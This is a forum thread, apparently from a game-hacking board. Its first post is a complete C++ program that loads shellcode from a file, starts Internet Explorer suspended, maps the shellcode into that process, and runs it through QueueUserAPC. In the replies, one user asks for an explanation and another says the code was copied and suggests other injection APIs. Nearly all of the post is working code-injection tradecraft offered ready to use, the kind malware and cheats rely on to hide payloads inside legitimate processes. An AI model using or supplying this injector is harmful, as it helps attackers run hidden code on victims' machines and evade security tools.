Results 1 to 3 of 3
  1. #1
    The_USDL
    The_USDL is offline
    Senior Member The_USDL's Avatar
    Join Date
    2011 Oct
    Posts
    201
    Thanks Thanks Given 
    24
    Thanks Thanks Received 
    538
    Thanked in
    47 Posts
    Rep Power
    0

    Code Injection - QueueUserAPC

    Code:
     #define _WIN32_WINNT 0x0400
            #include <windows.h>
     
     //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    
            typedef LONG NTSTATUS, *PNTSTATUS;
            #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
     
            typedef enum _SECTION_INHERIT
            {
            ViewShare = 1,
            ViewUnmap = 2
            } SECTION_INHERIT;
     
     
     
            typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE,
            HANDLE,
            LPVOID,
            ULONG,
            SIZE_T,
            LARGE_INTEGER*,
            SIZE_T*,
            _INHERIT,
            ULONG,
            ULONG );
     
            func_NtMapViewOfSection NtMapViewOfSection = NULL;
     
     
     
     
     
     
     
     
     
     
            LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess,
            HANDLE hFileMappingObject,
            DWORD dwDesiredAccess,
            DWORD dwFileOffsetHigh,
            DWORD dwFileOffsetLow,
            DWORD dwNumberOfBytesToMap,
            LPVOID lpBaseAddress )
            {
            NTSTATUS Status;
            LARGE_INTEGER SectionOffset;
            ULONG ViewSize;
            ULONG Protect;
            LPVOID ViewBase;
     
     
            // Convert the offset
            SectionOffset.LowPart = dwFileOffsetLow;
            SectionOffset.HighPart = dwFileOffsetHigh;
     
            // Save the size and base
            ViewBase = lpBaseAddress;
            ViewSize = dwNumberOfBytesToMap;
     
            // Convert flags to NT Protection Attributes
            if (dwDesiredAccess & FILE_MAP_WRITE)
            {
            Protect = PAGE_READWRITE;
            }
            else if (dwDesiredAccess & FILE_MAP_READ)
            {
            Protect = PAGE_READONLY;
            }
            else if (dwDesiredAccess & FILE_MAP_COPY)
            {
            Protect = PAGE_WRITECOPY;
            }
            else
            {
            Protect = PAGE_NOACCESS;
            }
     
            // Map the section
            Status = NtMapViewOfSection(hFileMappingObject,
            hProcess,
            &ViewBase,
            0,
            0,
            &SectionOffset,
            &ViewSize,
            ViewShare,
            0,
            Protect);
            if (!NT_SUCCESS(Status))
            {
            // We failed
            return NULL;
            }
     
            // Return the base
            return ViewBase;
            }
     
     
     
     
            int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
            {
            HMODULE hDll = LoadLibrary( "ntdll.dll" );
            NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
            // Getting a shellcode, use whatever you want
            HANDLE hFile = CreateFile ("C:\\shellcode.txt",
            GENERIC_READ,
            0,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
            HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
            // Starting target process
            STARTUPINFO st;
            ZeroMemory (&st, sizeof(st));
            st.cb = sizeof (STARTUPINFO);
            PROCESS_INFORMATION pi;
            ZeroMemory (&pi, sizeof(pi));
            CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe",
            NULL,
            NULL,
            NULL,
            FALSE,
            CREATE_SUSPENDED,
            NULL,
            NULL,
            &st,
            &pi);
            // Injecting the shellcode into target process address space
            LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess,
            hMappedFile,
            FILE_MAP_READ,
            0,
            0,
            0,
            NULL);
            // Create a new APC which will be executed at first when the thread resume
            QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
            ResumeThread (pi.hThread);
            CloseHandle (hFile);
            CloseHandle (hMappedFile);
            CloseHandle (pi.hThread);
            CloseHandle (pi.hProcess);
            return 0;
            }

    PRESS THANKS
    Last edited by The_USDL; 2012-02-08 at 07:07 PM.

  2. #2
    DatSik
    DatSik is offline
    New member DatSik's Avatar
    Join Date
    2012 Sep
    Location
    Oklahoma
    Posts
    24
    Thanks Thanks Given 
    1
    Thanks Thanks Received 
    9
    Thanked in
    1 Post
    Rep Power
    0
    I appreciate this, could you explain a bit more? if you have time that is, its not big deal but I would like to hear what you have to say

  3. #3
    Sirmabus
    Sirmabus is offline
    New member
    Join Date
    2010 Jul
    Posts
    20
    Thanks Thanks Given 
    2
    Thanks Thanks Received 
    10
    Thanked in
    4 Posts
    Rep Power
    0

    Copy and paste? Also use the ntdll.dll version

    Did you copy and paste this or from some other blog from 2007?
    远程代码注入新技术 - hackycz的日志 - 网易博客
    It's the same exact code.

    It's interesting to map a shared memory and do it this way. The more traditional way is to use VirtualAllocEx() to allocate memory in the remote process, then WriteProcessMemory() to write to it.
    You usually only need to write mostly, the advantage I see in using shared is you could read from it directly, plus if you needed to repeated access it's faster then doing the xxxxxProcessMemory() functions.

    Also it would be better to use the the internal ntdll.dll layer version "NtQueueApcThread()" instead as QueueUserAPC() has some relevant process context stuff that might either cause it to fail or crash your target.

Similar Threads

  1. [C++] Dll injection - QueueUserAPC
    By The_USDL in forum Programming Tutorials
    Replies: 0
    Last Post: 2012-02-08, 06:00 PM
  2. [AutoIt] ASM injection into process
    By pohkak in forum AutoIt
    Replies: 2
    Last Post: 2011-07-30, 10:51 AM
  3. [Dev] DLL Injection Possible
    By Abstract in forum Forsaken World Bots, Hacks, Cheats
    Replies: 0
    Last Post: 2011-05-08, 12:16 AM
  4. [C++] Code Cave DLL Injection
    By Dwar in forum C/C++
    Replies: 1
    Last Post: 2010-11-29, 04:10 PM
  5. Code-Injection with Cheat Engine
    By Dwar in forum Game Researching Tutorials
    Replies: 0
    Last Post: 2010-11-14, 11:58 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •